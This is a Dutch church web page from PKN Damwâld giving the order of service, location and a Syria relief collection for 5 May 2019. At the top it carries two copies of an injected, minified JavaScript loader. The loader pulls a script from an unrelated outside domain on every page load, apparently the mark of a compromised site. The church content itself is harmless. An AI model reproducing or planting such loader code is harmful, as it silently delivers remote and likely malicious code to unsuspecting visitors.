;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 mei 2019 9:30 uur - PKN Damwâld
zondag 5 mei 2019
09:30 uur
Koffie na de dienst

Kerkdienst zondag 5 mei 2019 9:30 uur

Informatie

Voorganger:Dhr. W. Feddema, Driesum
Mededeling:Koffie na de dienst
Liturgie
lied voor de dienst Gezang 118
Welkom
Intochtslied Elb 124
Stil Gebed, Bemoediging en Groet
We zingen: Psalm 122 : 1 en 2
Wetslezing .
We zingen: Psalm 105 : 1 en 18
Gebed opening van Woord
We lezen: Lukas 24 : 13 - 35
We zingen: Gezang 170 : 1 en 2
Preek .
We zingen: Gezang 249
Dank- en Voorbede
Collecte
Slotlied Elb 184
Zegen
We zingen: Gezang 411 : 1 en 6
koffie , thee en fris staat klaar in het Skûlplak
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kerk zijn in oorlogstijd

Collecte voor de Kerk in Syrië - Kerk zijn in oorlogstijd
Op 5 mei vieren we nu al ruim 70 jaar onze vrijheid. In Syrië lijden miljoenen mensen al zeven jaar onder de gevolgen van een burgeroorlog. Hoewel Syrische kerken en gemeenten zelf ook zwaar getroffen zijn, bieden zij noodhulp aan mensen die een beroep doen op de kerk. Met voedsel, water, tijdelijk onderdak en medische zorg. Ook ondersteunen ze mensen die weer terugkeren naar veilige gebieden met vakopleidingen of leningen om een eigen bedrijf te starten. Laten we zondag 5 mei onze vrijheid vieren, maar tegelijk ook onze naasten in Syrië steunen. Met de opbrengst van de collecte ondersteunt Kerk in Actie de kerken in Syrië om noodhulp te geven.

Tweede collecte: Kerk
Uitganscollecte: Kerk